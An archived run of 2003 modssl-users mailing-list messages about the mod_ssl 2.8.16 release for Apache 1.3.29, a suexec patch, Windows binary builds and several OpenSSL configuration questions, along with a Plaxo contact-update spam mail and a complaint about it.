Received: from ns0a.swx.com (ns0a.swx.com [146.109.240.107])
	by master.modssl.org (Postfix) with ESMTP id 23127A893A
	for ; Fri, 31 Oct 2003 13:12:07 +0100 (CET)
Received: from gate0a.unix.swx.ch (gate0a [192.168.252.17])
	by ns0a.swx.com (8.12.10/8.12.10) with ESMTP id h9VCC2g9023903
	for ; Fri, 31 Oct 2003 13:12:02 +0100 (MET)
Received: from SOMEXEVS001.ex.ordersx.org (localhost [127.0.0.1])
	by gate0a.unix.swx.ch (8.12.10/8.12.10) with ESMTP id h9VCC1km000472
	for ; Fri, 31 Oct 2003 13:12:01 +0100 (MET)
Content-Class: urn:content-classes:message
MIME-Version: 1.0
Content-Type: text/plain;
	charset="iso-8859-1"
Content-Transfer-Encoding: 7bit
X-MimeOLE: Produced By Microsoft MimeOLE V5.50.4927.1200
Subject: RE: apache 1.3.29?
Date: Fri, 31 Oct 2003 13:12:01 +0100
Message-ID: 
X-MS-Has-Attach: 
Importance: normal
X-MS-TNEF-Correlator: 
Thread-Topic: apache 1.3.29?
thread-index: AcOfp4hkAeoT+2VpRcKVhekoCORBSwAAE90Q
From: "Boyle Owen" 
To: "mod_ssl list" 
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Boyle Owen" 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

>-----Original Message-----
>From: Andreas Gietl [mailto:a.gietl@e-admin.de]
>
>Mr Engelschall said yesterday on this list:

Arggg... I must've missed this... And I was especially looking out for
it!
my bad...
 
Rgds,
Owen Boyle
Disclaimer: Any disclaimer attached to this message may be ignored. 

>
>Yes, there will be a mod_ssl 2.8.16 released today or tomorrow. I've
>already upgraded mod_ssl to Apache 1.3.29, but I've still to include
>some other fixes. But 2.8.15 works fine with Apache 1.3.29, so no need
>to hurry here...
>                                       Ralf S. Engelschall
>                                       rse@engelschall.com
>                                       www.engelschall.com
>
>
>> Just to ask the question... Is a mod_ssl_2.8.16-1.3.29 forseen?
>>
>> Rgds,
>> Owen Boyle
>> Disclaimer: Any disclaimer attached to this message may be ignored.
>>
>> >-----Original Message-----
>>
>> From: Zvi Har'El [mailto:rl@math.technion.ac.il]
>>
>> >Sent: Donnerstag, 30. Oktober 2003 09:54
>> >To: modssl-users@modssl.org
>> >Cc: rse@engelschall.com
>> >Subject: Re: apache 1.3.29?
>> >
>> >
>> >Hi Ralf,
>> >
>> >If you don't mind, please include a fix which allows the HTTPS
>> >env variable
>> >to be passed by suexec
>> >
>> >--- apache_1.3.28/src/support/suexec.c.~20030719062731~ Sat
>> >Jul 19 09:27:31
>> >2003
>> >+++ apache_1.3.28/src/support/suexec.c  Tue Aug 26 16:49:20 2003
>> >@@ -134,7 +134,7 @@
>> >     /* variable name starts with */
>> >     "HTTP_",
>> > #ifdef MOD_SSL
>> >-    "HTTPS_",
>> >+    "HTTPS=",
>> >     "SSL_",
>> > #endif
>> >
>> >This is already included in apache 2
>> >
>> >Thanks,
>> >
>> >Zvi.
>> >
>> >
>> >On Thu, 30 Oct 2003 09:06:52 +0100, Ralf S. Engelschall wrote
>> >
>> >about "Re: apache 1.3.29?":
>> >> In article <200310291447.h9TElr409832@devsys.jaguNET.com> 
>you wrote:
>> >> > Andreas Gietl wrote:
>> >> >> On Wednesday 29 October 2003 15:39, Jim Jagielski wrote:
>> >> >>
>> >> >> i guess there will be a new patch within the next days/hours?
>> >> >
>> >> > I would guess, but that's not my area :)
>> >>
>> >> Yes, there will be a mod_ssl 2.8.16 released today or 
>tomorrow. I've
>> >> already upgraded mod_ssl to Apache 1.3.29, but I've still 
>to include
>> >> some other fixes. But 2.8.15 works fine with Apache 1.3.29,
>> >
>> >so no need
>> >
>> >> to hurry here...
>> >>                                        Ralf S. Engelschall
>> >>                                        rse@engelschall.com
>> >>                                        www.engelschall.com
>> >
>> 
>>______________________________________________________________________
>> >
>> >> Apache Interface to OpenSSL (mod_ssl)
>>
>> www.modssl.org
>>
>> > User Support Mailing List                      
>modssl-users@modssl.org
>> > Automated List Manager                            
>majordomo@modssl.org
>
>-- 
>e-admin internet gmbh
>Andreas Gietl                                            tel 
>+49 941 3810884
>Ludwig-Thoma-Strasse 35                      fax +49 
>(0)1805/39160 - 29104
>93051 Regensburg                                  mobil +49 171 6070008
>
>PGP/GPG-Key unter http://www.e-admin.de/gpg.html
>
>
>
>
>

This message is for the named person's use only. It may contain
confidential, proprietary or legally privileged information. No
confidentiality or privilege is waived or lost by any mistransmission.
If you receive this message in error, please notify the sender urgently
and then immediately delete the message and any copies of it from your
system. Please also immediately destroy any hardcopies of the message.
You must not, directly or indirectly, use, disclose, distribute, print,
or copy any part of this message if you are not the intended recipient.
The sender's company reserves the right to monitor all e-mail
communications through their networks. Any views expressed in this
message are those of the individual sender, except where the message
states otherwise and the sender is authorised to state them to be the
views of the sender's company. 


______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Sat Nov  1 20:47:34 2003
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id 59453A8A4D; Sat,  1 Nov 2003 20:47:34 +0100 (CET)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from visp.engelschall.com (visp.engelschall.com [195.27.176.148])
	by master.modssl.org (Postfix) with ESMTP
	id 84F82A8933; Sat,  1 Nov 2003 20:47:33 +0100 (CET)
Received: by visp.engelschall.com (Postfix, from userid 1005)
	id 6CE2B4CE563; Sat,  1 Nov 2003 20:47:33 +0100 (CET)
Received: by en1.engelschall.com (Postfix, from userid 10000)
	id C5BB028632; Sat,  1 Nov 2003 20:47:21 +0100 (CET)
Date: Sat, 1 Nov 2003 20:47:21 +0100
From: "Ralf S. Engelschall" 
To: modssl-announce@modssl.org, modssl-users@modssl.org
Subject: [ANNOUNCE] mod_ssl 2.8.16 for Apache 1.3.29
Message-ID: <20031101194721.GA8380@engelschall.com>
Mime-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Content-Disposition: inline
User-Agent: Mutt/1.4.1i
Organization: Engelschall, Germany.
X-Web-Homepage: http://www.engelschall.com/
X-PGP-Public-Key: http://www.engelschall.com/ho/rse/pgprse.asc
X-PGP-Fingerprint: 00 C9 21 8E D1 AB 70 37 DD 67 A2 3A 0A 6F 8D A5
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Ralf S. Engelschall" 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

Apache 1.3.29 was released a few days ago. Although mod_ssl 2.8.15 would
still work fine with it, as usual, I take this new Apache release as the
trigger for releasing a corresponding mod_ssl version -- which is again
100% aligned to Apache 1.3.29 and also includes a few bugfixes which
were pending in my maintainance queue (see CHANGES entries below).

Fetch mod_ssl 2.8.16 from:

o http://www.modssl.org/source/
o  ftp://ftp.modssl.org/source/

Yours,
                                       Ralf S. Engelschall
                                       rse@engelschall.com
                                       www.engelschall.com

  Changes with mod_ssl 2.8.16 (18-Jul-2003 to 01-Nov-2003)

   *) Upgraded to Apache 1.3.29

   *) Avoid memory corruption in certificate handling caused by a heap
      memory double-freeing situation.

   *) Allow "HTTPS" variable to be passed through by suEXEC.

   *) Clear the OpenSSL error code in pass phrase reading code to
      workaround the following situation: multiple keys, all with
      different passphrases -- entering the correct pass phrase at each
      prompt leads to an OpenSSL error message after the last prompt.

   *) Reverted the recent change where ap_cleanup_for_exec() called
      ap_kill_alloc_shared(). This caused nasty side-effects in other
      processes and is not necessary at all (because shared memory
      segments are not inherited across exec).

   *) mod_ssl was checking the OpenSSL error reason code against
      SSL_R_HTTP_REQUEST and concluded the result is an SSL error. Since
      OpenSSL reason codes are not unique, this isn't always the case.
      It now additionally checks that the library is the SSL library.

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Sun Nov  2 02:48:43 2003
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id 1BB87A893D; Sun,  2 Nov 2003 02:48:43 +0100 (CET)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from tomts22-srv.bellnexxia.net (tomts22-srv.bellnexxia.net [209.226.175.184])
	by master.modssl.org (Postfix) with ESMTP id 344D0A8939
	for ; Sun,  2 Nov 2003 02:48:26 +0100 (CET)
Received: from osts ([64.231.120.35]) by tomts22-srv.bellnexxia.net
          (InterMail vM.5.01.06.05 201-253-122-130-105-20030824) with ESMTP
          id <20031102014820.MHXW19878.tomts22-srv.bellnexxia.net@osts>;
          Sat, 1 Nov 2003 20:48:20 -0500
Subject: Apache 1.3.29 and 2.0.48 with SSL binaries for Windows
From: hunter 
To: users@httpd.apache.org
Cc: modssl-users@modssl.org
Content-Type: text/plain
Message-Id: <1067737700.542.57.camel@ptak.tor>
Mime-Version: 1.0
X-Mailer: Ximian Evolution 1.4.4 
Date: Sat, 01 Nov 2003 20:48:20 -0500
Content-Transfer-Encoding: 7bit
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: hunter 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

I have just finished building the new Apache binaries for Windows.

Apache 1.3.29 with mod_ssl and openssl  
Apache 2.0.48 with mod_ssl (built-in), openssl and zlib

Only the newest files can be found here... 
http://hunter.campbus.com/

MD5's, and all previous builds can be found here...
http://tor.ath.cx/~hunter/apache/

In addition to OpenSSL (made with MASM) I also added zlib to build
mod_deflate.so in Apache 2.0.47-48 for those who are interested in using
it - it is not configured, just like the mod_ssl.so.

Note: some configuration is required.

I build to c:\apache so if you use the same directory your configuration
effort will be less, unless of course you are upgrading. Be careful
though, Apache 1.3.xx conf is different from Apache 2.0.xx, and very
early versions of Apache2 had differences with the latest versions.  

To install Apache (2.0.xx), follow these simple steps. 
(Apache 1.3.xx is similar but different)

1. create a directory (c:\apache) or if you are upgrading, save your
httpd.conf or it could be overwritten.
 
2. unzip the binaries into this directory - make certain you created the
sub-dirs.

3. go to the conf directory and edit httpd.conf or replace the
httpd.conf with the one you saved.

4. go to the 'bin' directory in a console.

Type the following commands:

- if you are already installed, type 'apache -k uninstall'
- then type 'apache -k install'
- then type 'apache -k start'

Check the error logs if it fails to start, but some configuration errors
will be displayed in your console. Apache also logs to the event log. 

If you detect flaws in the build please email me so that I can fix them
as soon as possible. I don't use these binaries so I need you to tell me
if there is something wrong with them. I build a branded version in my
workplace and use Apache2 on Debian/GNU Linux at home.       

Configuration questions should be directed to the list after reading the
documentation and searching the list archives - let everyone benefit
from the answers you get. 

Chris Lewis


______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Mon Nov  3 16:39:18 2003
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id B8D72A8947; Mon,  3 Nov 2003 16:39:18 +0100 (CET)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from relay.pair.com (relay.pair.com [209.68.1.20])
	by master.modssl.org (Postfix) with SMTP id 35EF2A8941
	for ; Mon,  3 Nov 2003 16:39:17 +0100 (CET)
Received: (qmail 71076 invoked from network); 3 Nov 2003 15:39:15 -0000
Received: from unknown (HELO holotech-4edh67) (65.217.105.234)
  by relay.pair.com with SMTP; 3 Nov 2003 15:39:15 -0000
X-pair-Authenticated: 65.217.105.234
Date: Mon, 3 Nov 2003 10:39:16 -0500
From: modssl@holotech.net
X-Mailer: The Bat! (v1.60q) Personal
Organization: Holotech Enterprises
X-Priority: 3 (Normal)
Message-ID: <12212190749.20031103103916@holotech.net>
To: modssl-users@modssl.org
Subject: Client Variables
MIME-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Content-Transfer-Encoding: 7bit
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: modssl@holotech.net
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

The SSL_CLIENT_* variables are not appearing in my environment. My web
host insists it's something my CGI needs to do to request this
information from the client, but that doesn't make sense to me. I
obtained a certificate from Thawte and installed it in my browser, but
that doesn't make a difference. Is there something else I need to do?
Is there something my host needs to do?

-- 
Alan Little
Holotech Enterprises

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Tue Nov  4 01:25:22 2003
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id 8C20DA8945; Tue,  4 Nov 2003 01:25:22 +0100 (CET)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from mta01-srv.alltel.net (mta01.alltel.net [166.102.165.143])
	by master.modssl.org (Postfix) with ESMTP id 0A6A3A8933
	for ; Tue,  4 Nov 2003 01:25:05 +0100 (CET)
Received: from woodware1 ([162.40.193.122]) by mta01-srv.alltel.net
          with SMTP
          id <20031104002503.SSUM4162.mta01-srv.alltel.net@woodware1>
          for ; Mon, 3 Nov 2003 18:25:03 -0600
Message-ID: <003601c3a26a$14779440$0300000a@woodware1>
From: "Don Woodward" 
To: 
References: <1067737700.542.57.camel@ptak.tor>
Subject: Re: Apache 1.3.29 and 2.0.48 with SSL binaries for Windows
Date: Mon, 3 Nov 2003 19:24:58 -0500
MIME-Version: 1.0
Content-Type: text/plain;
	charset="Windows-1252"
Content-Transfer-Encoding: 7bit
X-Priority: 3
X-MSMail-Priority: Normal
X-Mailer: Microsoft Outlook Express 6.00.2800.1158
X-MimeOLE: Produced By Microsoft MimeOLE V6.00.2800.1165
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Don Woodward" 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

Attempting to make my own cert on my Win32 system at work it appears I'm
missing the OpenSSL configuration file - see error below.

I've built OpenSSL under Solaris before but my Sun is not up at the moment
to get the file from - anyone have a configuration file example?

C:\Apache\bin>openssl req -new -key server.key -out server.csr
Unable to load config info
Enter pass phrase for server.key:
unable to find 'distinguished_name' in config
problems making Certificate Request
672:error:0E06D06A:configuration file routines:NCONF_get_string:no conf or
envir
onment variable:.\crypto\conf\conf_lib.c:325:


Thanks,

Don Woodward


----- Original Message ----- 
From: "hunter" 
To: 
Cc: 
Sent: Saturday, November 01, 2003 20:48
Subject: Apache 1.3.29 and 2.0.48 with SSL binaries for Windows


I have just finished building the new Apache binaries for Windows.

Apache 1.3.29 with mod_ssl and openssl
Apache 2.0.48 with mod_ssl (built-in), openssl and zlib

Only the newest files can be found here...
http://hunter.campbus.com/

MD5's, and all previous builds can be found here...
http://tor.ath.cx/~hunter/apache/

In addition to OpenSSL (made with MASM) I also added zlib to build
mod_deflate.so in Apache 2.0.47-48 for those who are interested in using
it - it is not configured, just like the mod_ssl.so.

Note: some configuration is required.

I build to c:\apache so if you use the same directory your configuration
effort will be less, unless of course you are upgrading. Be careful
though, Apache 1.3.xx conf is different from Apache 2.0.xx, and very
early versions of Apache2 had differences with the latest versions.

To install Apache (2.0.xx), follow these simple steps.
(Apache 1.3.xx is similar but different)

1. create a directory (c:\apache) or if you are upgrading, save your
httpd.conf or it could be overwritten.

2. unzip the binaries into this directory - make certain you created the
sub-dirs.

3. go to the conf directory and edit httpd.conf or replace the
httpd.conf with the one you saved.

4. go to the 'bin' directory in a console.

Type the following commands:

- if you are already installed, type 'apache -k uninstall'
- then type 'apache -k install'
- then type 'apache -k start'

Check the error logs if it fails to start, but some configuration errors
will be displayed in your console. Apache also logs to the event log.

If you detect flaws in the build please email me so that I can fix them
as soon as possible. I don't use these binaries so I need you to tell me
if there is something wrong with them. I build a branded version in my
workplace and use Apache2 on Debian/GNU Linux at home.

Configuration questions should be directed to the list after reading the
documentation and searching the list archives - let everyone benefit
from the answers you get.

Chris Lewis


______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org


______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Tue Nov  4 16:54:32 2003
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id 6DACEA8945; Tue,  4 Nov 2003 16:54:32 +0100 (CET)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from mx.plaxo.com (mx01.plaxo.com [66.54.249.34])
	by master.modssl.org (Postfix) with SMTP id 64B97A8933
	for ; Tue,  4 Nov 2003 16:54:27 +0100 (CET)
Received: (qmail 30184 invoked from network); 4 Nov 2003 15:53:23 -0000
Received: from pas05.plaxo.com (10.1.0.6)
  by mx1.plaxo.com with QMQP; 4 Nov 2003 15:53:23 -0000
Received: from 24.26.103.103 by pas02.plaxo.com; 4 Nov 2003 15:39:04 -0000
Message-ID: <1067961202.17685.96737.sendUpdate@mx.plaxo.com>
Date: 4 Nov 2003 15:53:22 -0000
From: "Kevin Klawon" 
To: "modssl-users@modssl.org" 
Subject: Your Contact Info
MIME-Version: 1.0
Content-Type: multipart/mixed;
 boundary="_-------==1277531469"
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Kevin Klawon" 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

This is a multi-part message in MIME format.

--_-------==1277531469
Content-Type: multipart/alternative;
	boundary="_--=======2371541285"

--_--=======2371541285
Content-Type: text/plain;
	charset="us-ascii"
Content-Transfer-Encoding: 7bit

modssl-users@modssl.org,

I'm updating my address book. Please take a moment to update
your latest contact information. Your information is stored in
my personal address book and will not be shared with anyone
else. Plaxo is free, if you'd like to give it a try.


Click the following link to correct or confirm your information: https://www.plaxo.com/edit_contact_info?r=17179975414-4852159--1665897486&t=web

Name: modssl-users@modssl.org
Job Title: 
Company: 
Work E-mail: modssl-users@modssl.org
Work Phone: 
Work Fax: 
Work Address Line 1: 
Work Address Line 2: 
Work City, State, Zip: 
Mobile Phone: 

Home E-mail: 
Home Phone: 
Home Fax: 
Home Address Line 1: 
Home Address Line 2: 
Home City, State, Zip: 
Birthday: 
My current contact information:



P.S. I've included my Plaxo card below so that you have my current information.  I've also attached a copy as a vCard.

 +-----------------
 | Kevin Klawon
 | kevin@intersighttechnologies.com
 | CTO
 | 
 | InterSightTechnologies
 | work: 407-854-8765
 | mobile: 203-675-5644
 | web: www.intersighttechnologies.com
 +-------------------------------------

____________________________________________________________
This message was sent to you by kevin@klawon.org
via Plaxo.  To have Plaxo automatically handle these messages
in the future, go to: http://www.plaxo.com/autoreply

Plaxo's Privacy Policy: http://www.plaxo.com/support/privacy

--_--=======2371541285
Content-Type: text/html;
	charset="ISO-8859-1"
Content-Transfer-Encoding: 8bit






Your Contact Info









  

    
      

       

      
      

      
        

  

  
    
  
  
    
       This is the second Plaxo message you've received. Get Plaxo to automatically handle these messages.
    
  
  








      		
      

      

        
 
          

	    
modssl-users@modssl.org,

	    
I'm updating my address book. Please take a moment to update
your latest contact information. Your information is stored in
my personal address book and will not be shared with anyone
else. Plaxo is free, if you'd like to give it a try.


	    
Thanks,
Kevin Klawon


	    
 

          		

           
	    
            

             
              
Click the buttons below to change or confirm your info

              
 
                

		  
		  
  


        

          
 
	    

             
              


                

                  
                  
		    

  

    
    

      
	modssl-users@modssl.org
			        

	no title

      		
      
      
      
      
	
	no company

	
	
	
	
	
	no work address
	
 
	
	
	
	
	
      		
    

    

      
    

    

        
	  


	             
modssl-users@modssl.org           


  	  
	  
	  no web page

	  IM: none

        		

      

      
        


        

	 
work: none

	 
	 
fax: none

	 
mobile: none

	 
pager: none

         
	

      		
    

  


                  		
                

                
		

  		  
                    
 

                  		
                
		

                
		

                  
		  


		  

		  

		    


		    Is this information correct? 

		    
		    

		      

		      

		      
		      


		      

		    

		    		

		    
		     

		       
		      

		      
		      


		      
		      

		    

		    		

		    

		  

		  

		  
		    
                  		
                

              

            		
	    

  


          

          
 
	  
	    
	  
          

        


		  
  


		  

				
              

	    
	    
 
	    

          		
	

	

	  
	    
	    

P.S. I've attached my current information in a vcard. If you 
	    get Plaxo too, we'll stay in touch automatically.

	    
 	  		
	

      
      

    		
  








--_--=======2371541285--


--_-------==1277531469
Content-Type: text/x-vcard; charset=ISO-8859-1; name="Kevin Klawon.vcf"
Content-Transfer-Encoding: 8bit
Content-Disposition: attachment; filename="Kevin Klawon.vcf"

BEGIN:VCARD 
VERSION:2.1
X-PLAXO-VERSION:1.0
N:Klawon;Kevin;;;
FN:Kevin Klawon
ORG:InterSightTechnologies
TITLE:CTO
TEL;WORK;VOICE:407-854-8765
TEL;CELL;VOICE:203-675-5644
EMAIL;PREF;INTERNET:kevin@intersighttechnologies.com
URL;WORK:www.intersighttechnologies.com
END:VCARD

--_-------==1277531469--




______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Tue Nov  4 17:05:33 2003
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id 85487A8962; Tue,  4 Nov 2003 17:05:33 +0100 (CET)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from gretel.pobox.com (gretel.pobox.com [208.210.125.56])
	by master.modssl.org (Postfix) with ESMTP id B6D9EA8936
	for ; Tue,  4 Nov 2003 17:05:27 +0100 (CET)
Received: from texas.pobox.com (texas.pobox.com[64.49.223.111])
	by gretel.pobox.com (Postfix) with ESMTP id 13B38B1719D
	for ; Tue,  4 Nov 2003 11:05:18 -0500 (EST)
Received: from w3works.com (66-133-173-18.sdsl01.roc.ny.frontiernet.net [66.133.173.18])
	(using TLSv1 with cipher DES-CBC3-SHA (168/168 bits))
	(No client certificate requested)
	by texas.pobox.com (Postfix) with ESMTP id 291F34534A
	for ; Tue,  4 Nov 2003 11:05:17 -0500 (EST)
Date: Tue, 4 Nov 2003 11:05:25 -0500
Subject: [moderator-request] Re: Your Contact Info
Content-Type: text/plain; charset=US-ASCII; format=flowed
Mime-Version: 1.0 (Apple Message framework v552)
From: Dave Paris 
To: modssl-users@modssl.org
Content-Transfer-Encoding: 7bit
In-Reply-To: <1067961202.17685.96737.sendUpdate@mx.plaxo.com>
Message-Id: 
X-Mailer: Apple Mail (2.552)
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Dave Paris 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

Will the moderator(s) be so kind as to killfile this user?   Thanks, we 
get enough spam without it bypassing internal filters for important 
listservs like modssl-users.

Kind Regards,
-dsp

On Tuesday, Nov 4, 2003, at 10:53 US/Eastern, Kevin Klawon wrote:


>
> 

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Tue Nov  4 17:40:24 2003
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id 70A25A8945; Tue,  4 Nov 2003 17:40:24 +0100 (CET)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from calypso.urec.cnrs.fr (calypso.urec.cnrs.fr [194.57.137.114])
	by master.modssl.org (Postfix) with ESMTP id BCD17A8933
	for ; Tue,  4 Nov 2003 17:40:07 +0100 (CET)
Received: from urec.cnrs.fr (pan.paris.urec.cnrs.fr [194.57.137.45])
          by calypso.urec.cnrs.fr (8.12.8p1/jtpda-5.4) with ESMTP id hA4Ge5qb020631
          for ; Tue, 4 Nov 2003 17:40:05 +0100
Message-ID: <3FA7D681.6070406@urec.cnrs.fr>
Date: Tue, 04 Nov 2003 17:40:33 +0100
From: xavier jeannin 
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.0; fr-FR; rv:1.0.2) Gecko/20030208 Netscape/7.02
X-Accept-Language: fr-fr, fr
MIME-Version: 1.0
To: modssl-users@modssl.org
Subject: Distinghished Name of X509 depend on version of ModSSL ?
Content-Type: text/plain; charset=ISO-8859-1; format=flowed
Content-Transfer-Encoding: 8bit
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: xavier jeannin 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

Hello


I want to extract the Distinghished Name of a X509 certificat for 
checking the access of my  HTTP server (see FakeBasicAuthentification)

with the new version of openssl I have the following result :
/usr/local/openssl-0.9.7c/apps/openssl x509 -noout -subject -in 
/home/apache/htdocs/dess/intranetSTIC/UPS836-2003-2004.pem
subject= /C=FR/O=CNRS/OU=UPS836/CN=Xavier 
Jeannin/emailAddress=Xavier.Jeannin@urec.cnrs.fr
with the old version of openssl of Redhat I have the following result :
  /usr/bin/openssl x509 -noout -subject -in 
/home/apache/htdocs/dess/intranetSTIC/UPS836-2003-2004.pem
subject= /C=FR/O=CNRS/OU=UPS836/CN=Xavier 
Jeannin/Email=Xavier.Jeannin@urec.cnrs.fr

As Apache uses the DN to select the access on directory, my user cannot 
access to my server because DN does not match anymore DN in password file.
the solution could be to change my files password file (htpasswd) but I 
have lot of this kind of file
Is there any way to change the result of openssl command by 
configuration at runtime or at compilation ?

thank you
--xj

-- 
_____________________________________________________________________________________________
Xavier Jeannin
UREC/CNRS Université P. & M. Curie, Courrier : case 171, 4 place Jussieu 75252 PARIS CEDEX 05
Tél : 01 44 27 42 59 - Fax : 01 44 27 42 61 - Courriel : jeannin@urec.cnrs.fr


______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Wed Nov  5 01:22:29 2003
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id F12FDA8962; Wed,  5 Nov 2003 01:22:28 +0100 (CET)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from mta01-srv.alltel.net (mta01.alltel.net [166.102.165.143])
	by master.modssl.org (Postfix) with ESMTP id DA85DA8941
	for ; Wed,  5 Nov 2003 01:22:11 +0100 (CET)
Received: from woodware1 ([162.40.198.145]) by mta01-srv.alltel.net
          with SMTP
          id <20031105002210.NRUW4162.mta01-srv.alltel.net@woodware1>
          for ; Tue, 4 Nov 2003 18:22:10 -0600
Message-ID: <004101c3a332$d78b0390$0300000a@woodware1>
From: "Don Woodward" 
To: 
References: <1067737700.542.57.camel@ptak.tor> <003601c3a26a$14779440$0300000a@woodware1>
Subject: Re: Apache 1.3.29 and 2.0.48 with SSL binaries for Windows
Date: Tue, 4 Nov 2003 19:22:05 -0500
MIME-Version: 1.0
Content-Type: text/plain;
	charset="Windows-1252"
Content-Transfer-Encoding: 7bit
X-Priority: 3
X-MSMail-Priority: Normal
X-Mailer: Microsoft Outlook Express 6.00.2800.1158
X-MimeOLE: Produced By Microsoft MimeOLE V6.00.2800.1165
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Don Woodward" 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

I found a copy and got it working.

Don Woodward

----- Original Message ----- 
From: "Don Woodward" 
To: 
Sent: Monday, November 03, 2003 19:24
Subject: Re: Apache 1.3.29 and 2.0.48 with SSL binaries for Windows


Attempting to make my own cert on my Win32 system at work it appears I'm
missing the OpenSSL configuration file - see error below.

I've built OpenSSL under Solaris before but my Sun is not up at the moment
to get the file from - anyone have a configuration file example?

C:\Apache\bin>openssl req -new -key server.key -out server.csr
Unable to load config info
Enter pass phrase for server.key:
unable to find 'distinguished_name' in config
problems making Certificate Request
672:error:0E06D06A:configuration file routines:NCONF_get_string:no conf or
envir
onment variable:.\crypto\conf\conf_lib.c:325:


Thanks,

Don Woodward


----- Original Message ----- 
From: "hunter" 
To: 
Cc: 
Sent: Saturday, November 01, 2003 20:48
Subject: Apache 1.3.29 and 2.0.48 with SSL binaries for Windows


I have just finished building the new Apache binaries for Windows.

Apache 1.3.29 with mod_ssl and openssl
Apache 2.0.48 with mod_ssl (built-in), openssl and zlib

Only the newest files can be found here...
http://hunter.campbus.com/

MD5's, and all previous builds can be found here...
http://tor.ath.cx/~hunter/apache/

In addition to OpenSSL (made with MASM) I also added zlib to build
mod_deflate.so in Apache 2.0.47-48 for those who are interested in using
it - it is not configured, just like the mod_ssl.so.

Note: some configuration is required.

I build to c:\apache so if you use the same directory your configuration
effort will be less, unless of course you are upgrading. Be careful
though, Apache 1.3.xx conf is different from Apache 2.0.xx, and very
